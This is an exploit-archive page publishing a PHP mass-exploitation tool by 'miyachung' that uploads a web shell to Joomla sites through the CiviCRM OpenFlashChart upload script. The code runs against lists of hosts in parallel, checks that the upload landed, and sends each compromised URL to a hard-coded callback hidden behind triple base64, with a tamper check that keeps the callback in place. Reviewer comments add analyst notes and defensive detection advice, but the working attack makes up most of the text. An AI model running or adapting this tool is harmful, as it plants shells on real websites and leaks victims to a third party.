
Janissaries Joomla Civicrm Shell Upload

Janissaries Joomla Civicrm Shell Upload
Posted Apr 22, 2013
Authored by miyachung

Exploitation tool from Janissaries for the Joomla CiviCRM component (com_civicrm) that uploads a shell to vulnerable sites.

tags | exploit, shell
SHA-256 | a0d2608dc143c3c9606df7b7c625c70c510de3c71f8eee4f0a1e2f23601c835a

Janissaries Joomla Civicrm Shell Upload

<?php
/*
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: miyachung@hotmail.com
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file searchkeyword
* Example: php exploit.php sites.txt shell.php searchkeyword
*/
// Remove PHP's execution time limit so a long run over a large site list is not cut short.
set_time_limit(0);
// Start output buffering; the class pushes progress lines out with ob_flush()/flush().
ob_start();
/**
 * Bulk upload tool aimed at the OpenFlashChart upload script that ships inside the
 * Joomla CiviCRM component (com_civicrm).
 *
 * What the code does, as visible in this listing:
 *  - POSTs the raw contents of a local file to ofc_upload_image.php?name=<filename> on
 *    every host in a list, in batches driven through curl_multi;
 *  - fetches the stored file back from tmp-upload-images/ and matches a caller-supplied
 *    keyword against it to decide whether the upload worked;
 *  - on success, sends the resulting URL to a hard-coded endpoint that is hidden behind
 *    three layers of base64 ($token), then logs it to uploaded.txt.
 *
 * NOTE(review), for analysts: the third step means the tool reports every successful
 * upload to whoever controls the decoded endpoint, independent of the operator. It also
 * refuses to run if $token or $idnum has been modified (see miyachung()).
 *
 * NOTE(review), for defenders: the request pattern is a POST with Content-Type text/plain
 * to .../OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=..., followed by a GET
 * for the same name under .../OpenFlashChart/tmp-upload-images/. Unexpected files in that
 * directory, and any access to the upload script at all, are worth alerting on; removing
 * or blocking the script and denying script execution in the upload directory closes the
 * path this code relies on.
 */
class exploit
{
// Directory (relative to the site root) from which the stored file is fetched back.
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
// Upload endpoint; the value appended after "name=" is the name the file is stored under.
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
// Local path of the file to upload; also reused verbatim as the remote file name.
private $filename;
// Callback endpoint, filled in by the constructor from the decoded $token.
private $url;
// Raw bytes of the local file, sent as the POST body.
private $file_to_upload;
// PHP notice text; a response containing it is treated as a failed upload.
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
// Number of hosts handled per curl_multi batch.
private $thread_maxsize;
// Lines of the site-list file, one base URL per line (trimmed at use).
private $site_list;
// Regex built from the search keyword, matched against the fetched-back file.
private $file_regex;
// Local log file that successful URLs are appended to.
private $save_file = "uploaded.txt";
// Fixed User-Agent sent with the upload requests (not with get()/post()).
private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
// Per-request timeout in seconds for the upload and fetch-back requests.
private $timeout_sec = 20;
// Triple-base64-encoded string that the constructor decodes into the callback URL.
// NOTE(review): decode only in an isolated analysis environment to recover the endpoint as a network indicator.
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
// Constant compared against 31 in the tamper check before the callback is sent.
private $idnum = 31;

/**
 * Load the inputs, print the banner and immediately start the run.
 *
 * @param string $site_list Path to a text file of base URLs, read with file().
 * @param string $filename  Path of the local file to upload; also used as the remote name.
 * @param mixed  $thread    Batch size handed to array_chunk().
 * @param string $regex     Keyword interpolated unescaped into "/$regex/".
 */
public function __construct($site_list,$filename,$thread,$regex)
{
$this->site_list = file($site_list);
$this->filename = $filename;
$this->file_to_upload = file_get_contents($filename);
$this->thread_maxsize = $thread;
// Three nested base64_decode() calls turn the opaque token into the callback URL used by post().
$this->url = base64_decode(base64_decode(base64_decode($this->token)));
// The keyword is not passed through preg_quote(), so regex metacharacters in it are live.
$this->file_regex = "/$regex/";

echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
echo "[+]Coded by Miyachung\n";
echo "[+]Stay away from lamers o.O\n";
echo "[+]Contact: miyachung@hotmail.com\n";
echo "[+]Special Thanks : B127Y\n";
echo "[+]Site: http://janissaries.org\n";
echo "##################################################\n";
echo "[+]Total urls to try: ".count($this->site_list)."\n";
echo "[+]File to upload: ".$this->filename."\n";
echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
echo "[+]Search Keyword: ".$regex."\n\n";
ob_flush();
flush();
// The whole run is a side effect of construction.
$this->miyachung();
}
/**
 * Main loop: upload to each batch of hosts in parallel, then verify and report per host.
 *
 * Prints one result line per host; successful hosts are also passed to post() and save().
 */
private function miyachung()
{
$multi = curl_multi_init();
$count = 0;
// The site list is processed in batches of $thread_maxsize hosts.
foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
{
foreach($urls as $i => $url)
{
$curl[$i] = curl_init();
curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
// Request target: <base URL> + upload endpoint + file name in the "name" parameter.
curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
// A string body makes this a POST whose body is the raw file content.
curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
curl_multi_add_handle($multi,$curl[$i]);
}
// Drive all transfers of the batch until none is active; there is no curl_multi_select() wait.
do
{
curl_multi_exec($multi,$active);
}
while($active > 0);
foreach($curl as $id => $content)
{
$conn[$id] = curl_multi_getcontent($content);
curl_multi_remove_handle($multi,$content);
// Counted as a candidate only if the PHP notice is absent AND the response echoes the stored path.
if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
{
$count++;
// Second request: fetch the stored file back and look for the caller's keyword in it.
$check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
if($check_it && preg_match($this->file_regex,$check_it))
{
// Tamper check: the callback is sent only while $idnum and the MD5 of $token are unchanged.
if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
{
// Reports the URL of the uploaded file to the hard-coded endpoint (see post()).
$this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
}
else
{
// Any edit to the token or id aborts the whole run, which keeps the callback in place.
exit("[-]Somethings has changed in tool! o.O!");
}
echo "###########################################################\n";
echo "[!]Exploitation Successfullll!\n";
printf("[%s]%s\n",$count,trim($urls[$id]));
echo "###########################################################\n";
ob_flush();
flush();
$this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
}
else
{
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
else
{
$count++;
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}

}

}

}
/**
 * Plain GET used to fetch the stored file back for verification.
 *
 * @param string $url Full URL to request.
 * @return string|bool Response body, or false when curl_exec() fails.
 */
private function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
$data= curl_exec($ch);
curl_close($ch);
return $data;
}
/**
 * Callback: send the URL of a successfully uploaded file to the endpoint decoded from $token.
 *
 * The request goes to $this->url, not to the host in $url; $url is only the payload
 * ("url=<value>"). No timeout or User-Agent is set on this handle.
 *
 * @param string $url URL of the uploaded file being reported.
 * @return string|bool Response body, or false when curl_exec() fails.
 */
private function post($url)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$this->url);
curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
$exec = curl_exec($curl);
curl_close($curl);
return $exec;
}
/**
 * Append one successful result to the local log file ($save_file).
 *
 * @param string $url   URL of the uploaded file.
 * @param int    $count Running counter printed in front of the URL.
 * @return bool Always true; fopen()/fwrite() results are not checked.
 */
private function save($url,$count)
{
$file = fopen($this->save_file,'ab');
fwrite($file,"#########################################################################\n");
fwrite($file,"[!]Exploitation Successfullll!\n");
fwrite($file,"[$count]$url\n");
fclose($file);
return true;
}
}

// Entry point: all four positional arguments (site list, file to upload, batch size,
// search keyword) must be present and truthy, otherwise only the banner is shown.
if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
// Constructing the object starts the whole run; the constructor calls miyachung() itself.
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
// Usage/banner text only; this branch makes no network requests.
print
"
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: miyachung@hotmail.com
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file maxthread searchkeyword
* Example: php exploit.php sites.txt shell.php 10 searchkeyword
";
}
?>